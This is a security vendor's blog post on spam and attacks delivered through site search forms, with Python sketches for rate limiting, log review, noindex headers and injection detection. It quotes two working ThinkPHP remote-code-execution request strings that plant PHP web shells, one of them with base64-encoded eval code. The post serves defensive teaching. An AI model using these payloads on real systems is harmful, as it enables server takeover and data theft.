As is well known, a search engine can index a page only if some link leads to that page.
Search and SEO bots crawl the pages of various sites, and when they find a link, they follow it and index the new content.
The content posted on a page is created by the site’s owners, authors, or users, and the site team reviews it. But if you think that you control all the content on your site, you are mistaken.
You can see and moderate comments and user posts, but what if there is content that you cannot see, yet it is indexed, and that content is spam?
This type of spam is quite difficult to detect because it is not static content on the site. It is distributed through the site’s search form.
How it works
The spammer opens the site’s search form and enters spam text into the search bar.
Next, your site generates a new page with a unique URL. The page says something like “Unfortunately, your request “Spam text” returned no results”.
Now the spammer has a link to a page on your site that already contains the spam text. All that remains is to pass this link to a search engine, and the search engine will index the content.
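To make the mechanism concrete, here is a minimal sketch of a search handler that echoes the query into a “no results” page. The function name render_no_results and the page markup are hypothetical and do not come from any particular CMS. The URL shape /?s=<query> is assumed for illustration.

```python
from html import escape
from urllib.parse import parse_qs, urlsplit


def render_no_results(url: str) -> str:
    """Build a 'no results' page for a search URL such as /?s=<query> (hypothetical handler)."""
    query = parse_qs(urlsplit(url).query).get("s", [""])[0]
    # Escaping stops script injection, but the query text is still
    # reflected into the page, so the spam text becomes page content.
    return (
        "<html><body><p>Unfortunately, your request "
        f"&ldquo;{escape(query)}&rdquo; returned no results.</p></body></html>"
    )


page = render_no_results("https://www.site.com/?s=Cheap+pills+call+555-0100")
print("Cheap pills call 555-0100" in page)  # prints True
```

Even with correct escaping, the generated page carries the spammer’s text at a URL on your domain, which is all the spammer needs.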
The danger is that you don’t even know what content has been generated on your site.
All the spammers have to do is run a search with the text they need. Suppose they write a text about your company and how to contact you, put in their own email and phone number, and then post a link to this search result. Search engines will index the page, and your site will end up showing the spammers’ contact details.
Another point concerns the search itself: a search results page is not a static page of the site. The site generates it on every request, which uses the server’s resources. What if there are a lot of such requests? With a large number of requests the site will slow down, and spammers can use such requests to mount a DDoS attack.
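One common way to limit the load from repeated searches is to cap the number of search requests per client. The sketch below is a simple in-memory sliding-window limiter. The class name SearchRateLimiter, the default limits, and the choice to key by IP address are assumptions for illustration, and it is not how any particular plugin works.

```python
import time
from collections import defaultdict, deque
from typing import Optional


class SearchRateLimiter:
    """Allow at most `limit` search requests per client within `window` seconds."""

    def __init__(self, limit: int = 10, window: float = 60.0):
        self.limit = limit
        self.window = window
        self._hits = defaultdict(deque)  # client IP -> timestamps of recent searches

    def allow(self, client_ip: str, now: Optional[float] = None) -> bool:
        now = time.monotonic() if now is None else now
        hits = self._hits[client_ip]
        # Drop timestamps that have fallen out of the window.
        while hits and now - hits[0] >= self.window:
            hits.popleft()
        if len(hits) >= self.limit:
            return False  # reject before the expensive search runs
        hits.append(now)
        return True


limiter = SearchRateLimiter(limit=2, window=10.0)
for t in (0.0, 1.0, 2.0):
    print(t, limiter.allow("203.0.113.5", now=t))
```

In this example the third request inside the 10-second window is refused. A limiter like this reduces load from a single client only. Requests spread over many IP addresses need blocking further upstream.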
Spammers may not even need to visit the site or use the search form to get the content they want.
Most CMSs have standard search URLs. For WordPress it looks like this: www.site.com/?s= or, for example, https://blog.cleantalk.org/?s=firewall
Therefore, it is enough to take a list of sites running a specific CMS and generate the necessary links, then submit these links to a search engine. When the search bot follows such a link, the CMS generates the required page.
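Because these pages are generated on demand, the server’s request log is one place where the generated content leaves a trace. The sketch below assumes the WordPress-style s parameter mentioned above and a plain list of request paths. The function name search_queries and the sample paths are made up for illustration.

```python
from collections import Counter
from urllib.parse import parse_qs, urlsplit


def search_queries(request_paths):
    """Yield the search text from each request that has a non-empty `s` parameter."""
    for path in request_paths:
        values = parse_qs(urlsplit(path).query).get("s")
        if values:
            yield values[0]


# Sample request paths (invented for this example).
paths = [
    "/?s=firewall",
    "/about/",
    "/?s=buy+cheap+watches+example.test",
    "/?s=buy+cheap+watches+example.test",
]
counts = Counter(search_queries(paths))
for query, hits in counts.most_common():
    print(hits, query)
```

Reviewing the most frequent queries shows which texts your site has been asked to render, including ones that were never typed into the search form.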
Another danger is an attempt to hack the site through the search form. Below are two examples of requests that were used against our blog.
A request to the site may look like this:
www.website.local//?s=index/%5C%5Cthink%5C%5Ctemplate%5C%5Cdriver%5C%5Cfile/write&cacheFile=robots.php&content=xbshell1<?php%24password%20=%20%5C"xinba%5C";%24ch%20=%20explode(%5C".%5C",%5C"hello.ass.world.er.t%5C");array_intersect_ukey(array(%24_REQUEST%5B%24password%5D%20=>%201),%20array(1),%20%24ch%5B1%5D.%24ch%5B3%5D.%24ch%5B4%5D);?>
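This is a web application attack: in this case, an attempt to exploit a vulnerability in PHP code to achieve remote code execution. The think\template and think\app paths in these requests suggest that they target sites built on the ThinkPHP framework. A second request looked like this: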
www.website.local//s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET[%27fuck%27]);&fuck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz54YnNoZWxs));
In other words, requests like these can be used to hack websites: to gain access to the server, execute arbitrary code, perform SQL injection, and steal passwords and user data.
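As a rough illustration, requests like the two above can be flagged by looking for PHP code fragments in the decoded query string. The pattern list below is an assumption drawn from these two examples only, and the function name looks_like_code_injection is hypothetical. A heuristic like this is easy to evade and is not a substitute for a web application firewall.

```python
import re
from urllib.parse import unquote

# Fragments taken from the two example requests. This is not a complete signature set.
SUSPICIOUS = re.compile(
    r"<\?php|\beval\s*\(|base64_decode|call_user_func_array|invokefunction"
    r"|\$_(?:GET|POST|REQUEST)",
    re.IGNORECASE,
)


def looks_like_code_injection(raw_query_string: str) -> bool:
    """Return True if the percent-decoded query string contains PHP code fragments."""
    return bool(SUSPICIOUS.search(unquote(raw_query_string)))


print(looks_like_code_injection("s=firewall"))
print(looks_like_code_injection(
    "s=index/think%5Capp/invokefunction&function=call_user_func_array"
))
```

The first call returns False and the second returns True. Legitimate searches for terms such as “base64_decode” would also be flagged, so a check like this is better suited to logging and review than to silent blocking.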
How to protect your site from this type of attack?
The first option is to remove or disable search on the site. Obviously, this is not the best option, but it will suit some sites.
The second option is to add the noindex and nofollow directives to the robots meta tag in the search results page template. Spammers will still make requests to your site and your site will still serve them, but search engines will not index this content. The danger of the site being hacked through the search form remains.
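For the second option, the directive can be sent either as a robots meta tag in the page template or as an X-Robots-Tag HTTP response header. Both are recognized by the major search engines. The sketch below assumes the WordPress-style s parameter, and the helper names is_search_request and extra_headers are hypothetical.

```python
from urllib.parse import parse_qs, urlsplit

# Meta tag variant, placed in the <head> of the search results template.
ROBOTS_META = '<meta name="robots" content="noindex, nofollow">'


def is_search_request(url: str) -> bool:
    """Treat any URL carrying an `s` parameter (even an empty one) as a search request."""
    return "s" in parse_qs(urlsplit(url).query, keep_blank_values=True)


def extra_headers(url: str) -> dict:
    """Header variant: tell crawlers not to index or follow search result pages."""
    if is_search_request(url):
        return {"X-Robots-Tag": "noindex, nofollow"}
    return {}


print(extra_headers("https://blog.cleantalk.org/?s=firewall"))
print(extra_headers("https://blog.cleantalk.org/about/"))
```

The directive takes effect only when the crawler is allowed to fetch the page. If search URLs are also blocked in robots.txt, the crawler never sees the noindex instruction.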
The third option is to use the CleanTalk Anti-Spam plugin. CleanTalk automatically adds the tags that prohibit indexing of search results and does not serve search requests from spam bots.
SpamFireWall blocks the most active spam bots before they reach a page of the site, which means less load on the site. The probability of hacking is reduced because requests from spam-active IP addresses are blocked. However, to protect fully against this type of attack, you need to use a web application firewall.
Learn more about how CleanTalk can protect your website from spam and malicious activity.